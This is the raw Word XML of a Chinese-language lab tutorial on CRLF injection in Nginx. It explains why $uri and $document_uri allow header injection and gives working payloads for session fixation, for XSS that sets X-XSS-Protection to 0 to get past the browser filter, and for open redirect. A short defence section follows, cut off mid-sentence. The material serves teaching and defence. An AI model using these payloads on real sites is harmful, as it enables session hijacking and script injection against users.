          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>环境</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>启动后，会开启8080</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>8081</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>8082</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>端口。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D7A85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lastRenderedPageBreak/>
        <w:t>直接访问8080</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">端口看效果：IP地址为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>192.168.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67625FE2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漏洞复现：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>抓包——添加会话固定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>/%0aSet-cookie:JSPSESSID%3Dpanch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44053D1D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Fonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>设置cookie就可以完成会话固定的攻击行为，以后用户访问此网站会被动用到此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>身份。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18065D7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查看配置：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>可见，通过注入就可以控制响应头键值对？是什么原因？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473CBFED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查看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>配置文件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009BC031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某</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>些</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>网站</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>为统一用户访问的域名或访问协议，在跳转过程中，需保证用户访问的页面不变，自</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7228CA2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动跳转到正确网址，所以需从Nginx获取用户请求的文件路径，然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>自动完成跳转，这就需</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E0166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要对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>进行配置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC869E0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查看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>文档，可以发现有三个表示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>uri</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的变量可以用于自动跳转网址：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9284E7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$uri、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>$document_uri</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">$request_uri </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5301532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因</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>$uri</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>$document_uri</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>是解码后的请求路径，可能包含换行符，造成CRLF注入漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E0ED9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 w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CRLF注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>攻击代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7406B60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用burp 抓包：在发送两连续的换行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>\r\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>后，可直接修改返回报文的返回体，插入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>代码引发XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408323F5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Fonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>payload如下：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>/%0d%0a%0d%0a&lt;img src=1 onerror=alert(/xss/)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02074500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注意问题：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEEC00D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浏览器的Filter(过滤器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>是应对反射型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>做的保护策略，当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>中含有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>相关特征时会</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414AB5A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过滤掉不显示在页面中，所以不能触发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A26921D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当数据包中 HTTP头含有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>X-XSS-Protection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>且值为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>时，浏览器才不会开启F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C05E5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将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">X-XSS-Protection:0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>注入到数据包中，再用两个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CRLF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>来注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 代码，来绕过F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，并执</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EF25F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行反射型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9034B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 xml:space="preserve">/%0aX-XSS-Protection:%200%0d%0a%0d%0a&lt;img </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>src=1 onerror=alert(/xss/)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16435555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CRLF Payload如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302D534E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color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">//探测漏洞： </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E19E5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 xml:space="preserve">%0d%0aheader:header </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B855D7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 xml:space="preserve">%0aheader:header </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56600FA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 xml:space="preserve">%0dheader:header </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E453696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color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>//开放重定向：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004BE5D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/www.google.com/%2f%2e%2e%0d%0aheader:header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABC6E25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color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>//CRLF-XSS：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DA7EE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%0d%0aContent-Length:35%0d%0aX-XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E421BC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Cs w:val="21"/>
        </w:rPr>
        <w:t>Protection:0%0d%0a%0d%0a23%0d%0a&lt;svg%20onload=alert(document.domain)&gt;%0d%0a0%0d%0a/%2e%2e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0930C1A5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color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>//XSS绕过：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E817F5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%2Fxxx:1%2F%0aX-XSS-Protection:0%0aContent-Type:text/html%0aContent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FE8FA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 xml:space="preserve">Length:39%0a%0a%3cscript%3ealert(document.cookie)%3c/ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DB0212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color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>//Location</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EB29A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%0d%0aContent-Type:%20text%2fhtml%0d%0aHTTP%2f1.1%20200%20OK%0d%0aContent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAADA7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Type:%20text%2fhtml%0d%0a%0d%0a%3Cscript%3Ealert('XSS');%3C%2fscript%3E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718AFFE8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lastRenderedPageBreak/>
        <w:t>漏洞防御：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8865FB" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr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对用户数据进行合法性校验，对特殊字符进行编码，如&lt;</w:t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ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>&gt;</w:t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ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>’</w:t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ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>”</w:t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ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>LF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>等，限制用户输</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BD546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入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
